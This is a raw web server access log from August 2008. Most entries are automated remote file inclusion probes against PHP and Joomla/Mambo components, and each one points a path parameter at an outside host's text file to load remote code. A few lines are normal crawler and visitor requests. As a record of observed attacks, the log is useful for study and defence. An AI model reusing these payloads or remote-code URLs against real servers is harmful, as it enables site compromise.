217.20.112.119 - - [06/Aug/2008:20:36:21 -0500] "GET /logs/access_log.1207353600 HTTP/1.1" 200 216651 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4222)"
203.56.255.14 - - [06/Aug/2008:20:39:05 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:39:05 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:39:05 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:40:20 -0500] "GET /logs/access_log.1206230400%20//?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
83.240.164.232 - - [06/Aug/2008:20:43:21 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
212.115.37.130 - - [06/Aug/2008:20:44:00 -0500] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.115.37.130 - - [06/Aug/2008:20:44:00 -0500] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
212.97.132.101 - - [06/Aug/2008:20:45:40 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:20:45:40 -0500] "GET //poll/poll_ssi.php?include_path=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:20:45:44 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:20:45:44 -0500] "GET //poll/poll_ssi.php?include_path=http://www.dalycityrecords.com/ids.txt??? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
203.56.255.14 - - [06/Aug/2008:20:45:52 -0500] "GET //?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
80.67.26.157 - - [06/Aug/2008:20:45:54 -0500] "GET /logs/errors.php?error=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.26.157 - - [06/Aug/2008:20:45:54 -0500] "GET /errors.php?error=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.106.191.163 - - [06/Aug/2008:20:46:06 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
147.202.40.223 - - [06/Aug/2008:20:48:07 -0500] "GET /logs/!scanhttp://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.814"
147.202.40.223 - - [06/Aug/2008:20:48:08 -0500] "GET /!scanhttp://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.814"
67.15.181.24 - - [06/Aug/2008:20:48:31 -0500] "GET //modules/xfsection/modify.php?dir_module=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
67.15.181.24 - - [06/Aug/2008:20:48:31 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
67.15.181.24 - - [06/Aug/2008:20:48:31 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
67.210.96.142 - - [06/Aug/2008:20:48:48 -0500] "GET //adminfoot.php?path[docroot]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 298 "-""Mozilla/4.61 [en] (OS/2; U)"
67.210.96.142 - - [06/Aug/2008:20:48:48 -0500] "GET /logs//adminfoot.php?path[docroot]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 303 "-""Mozilla/4.61 [en] (OS/2; U)"
212.34.140.215 - - [06/Aug/2008:20:48:49 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:48:49 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:48:49 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
80.67.24.170 - - [06/Aug/2008:20:49:31 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://mydump1.fortunecity.com/v6/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
80.67.24.170 - - [06/Aug/2008:20:49:31 -0500] "GET /logs/access_log.1216252800//poll/poll_ssi.php?include_path=http://mydump1.fortunecity.com/v6/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
80.67.24.170 - - [06/Aug/2008:20:49:31 -0500] "GET //poll/poll_ssi.php?include_path=http://mydump1.fortunecity.com/v6/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
80.67.24.170 - - [06/Aug/2008:20:49:31 -0500] "GET /logs/access_log.1215561600//poll/poll_ssi.php?include_path=http://mydump1.fortunecity.com/v6/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
203.56.255.14 - - [06/Aug/2008:20:49:37 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:49:37 -0500] "GET ///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:49:38 -0500] "GET /logs///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
80.67.24.170 - - [06/Aug/2008:20:49:40 -0500] "GET /logs/access_log.1214179200//poll/poll_ssi.php?include_path=http://mydump1.fortunecity.com/v6/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
80.67.24.170 - - [06/Aug/2008:20:49:52 -0500] "GET /logs/access_log.1216512000//poll/poll_ssi.php?include_path=http://mydump1.fortunecity.com/v6/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
212.34.140.215 - - [06/Aug/2008:20:50:11 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:50:11 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:50:12 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
83.240.164.232 - - [06/Aug/2008:20:50:49 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
206.71.148.152 - - [06/Aug/2008:20:50:57 -0500] "GET /logs//main.php?sayfa=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
206.71.148.152 - - [06/Aug/2008:20:50:57 -0500] "GET //main.php?sayfa=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
212.34.140.215 - - [06/Aug/2008:20:50:59 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:50:59 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:51:00 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
92.56.99.197 - - [06/Aug/2008:20:51:59 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:00 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:00 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:04 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:05 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:06 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:16 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:17 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:17 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:17 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:20:52:17 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
82.192.70.11 - - [06/Aug/2008:20:52:31 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
82.192.70.11 - - [06/Aug/2008:20:52:31 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
82.192.70.11 - - [06/Aug/2008:20:52:31 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
208.82.247.252 - - [06/Aug/2008:20:53:16 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
208.82.247.252 - - [06/Aug/2008:20:53:16 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
208.82.247.252 - - [06/Aug/2008:20:53:17 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
74.6.18.231 - - [06/Aug/2008:20:53:55 -0500] "GET /logs/access_log.1191110400 HTTP/1.0" 200 139145 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.12.93 - - [06/Aug/2008:20:54:55 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:54:55 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
65.214.45.147 - - [06/Aug/2008:20:54:59 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.147 - - [06/Aug/2008:20:54:59 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
204.15.10.144 - - [06/Aug/2008:20:57:21 -0500] "GET /logs/access_log.1214438400%20%20//modules/xfsection/modify.php?dir_module=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
189.1.168.93 - - [06/Aug/2008:20:57:40 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.810"
189.1.168.93 - - [06/Aug/2008:20:57:48 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.810"
89.111.172.23 - - [06/Aug/2008:20:58:34 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.111.172.23 - - [06/Aug/2008:20:58:35 -0500] "GET //poll/poll_ssi.php?include_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
218.38.12.93 - - [06/Aug/2008:21:01:11 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:01:12 -0500] "GET /phphtml.php?htmlclass_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:01:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
204.8.217.2 - - [06/Aug/2008:21:01:15 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
204.8.217.2 - - [06/Aug/2008:21:01:15 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 352 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
210.245.226.25 - - [06/Aug/2008:21:01:26 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
210.245.226.25 - - [06/Aug/2008:21:01:27 -0500] "GET //poll/poll_ssi.php?include_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
74.6.18.231 - - [06/Aug/2008:21:01:58 -0500] "GET /logs/access_log.1167091200 HTTP/1.0" 200 208825 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.115.37.130 - - [06/Aug/2008:21:02:05 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
212.115.37.130 - - [06/Aug/2008:21:02:05 -0500] "GET ///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
212.115.37.130 - - [06/Aug/2008:21:02:05 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
82.165.253.72 - - [06/Aug/2008:21:02:23 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
82.165.253.72 - - [06/Aug/2008:21:02:23 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
82.165.253.72 - - [06/Aug/2008:21:02:23 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
82.165.253.72 - - [06/Aug/2008:21:02:23 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
82.165.253.72 - - [06/Aug/2008:21:02:23 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
82.165.253.72 - - [06/Aug/2008:21:02:23 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:04:24 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:04:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:04:52 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:04:53 -0500] "GET /errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:04:53 -0500] "GET /logs/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.127.253.161 - - [06/Aug/2008:21:05:52 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:21:05:53 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.154.39.71 - - [06/Aug/2008:21:07:39 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
80.154.39.71 - - [06/Aug/2008:21:07:39 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
80.154.39.71 - - [06/Aug/2008:21:07:40 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
210.127.253.161 - - [06/Aug/2008:21:07:50 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:21:07:51 -0500] "GET /phphtml.php?htmlclass_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:21:07:52 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.45.177.194 - - [06/Aug/2008:21:08:21 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
207.45.177.194 - - [06/Aug/2008:21:08:21 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.812"
207.45.177.194 - - [06/Aug/2008:21:08:21 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
207.45.177.194 - - [06/Aug/2008:21:08:21 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.812"
218.38.12.93 - - [06/Aug/2008:21:08:24 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:08:27 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.127.253.161 - - [06/Aug/2008:21:09:33 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:21:09:33 -0500] "GET /errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:21:09:34 -0500] "GET /logs/errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.246.78.8 - - [06/Aug/2008:21:09:38 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.militaria.com/2? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.78.8 - - [06/Aug/2008:21:09:38 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.militaria.com/2? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
217.198.149.20 - - [06/Aug/2008:21:09:55 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 312 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
74.6.26.34 - - [06/Aug/2008:21:11:42 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [06/Aug/2008:21:11:42 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.22.100.83 - - [06/Aug/2008:21:11:53 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:21:11:54 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:21:11:54 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.813"
97.90.57.179 - - [06/Aug/2008:21:12:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:12:59 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:12:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
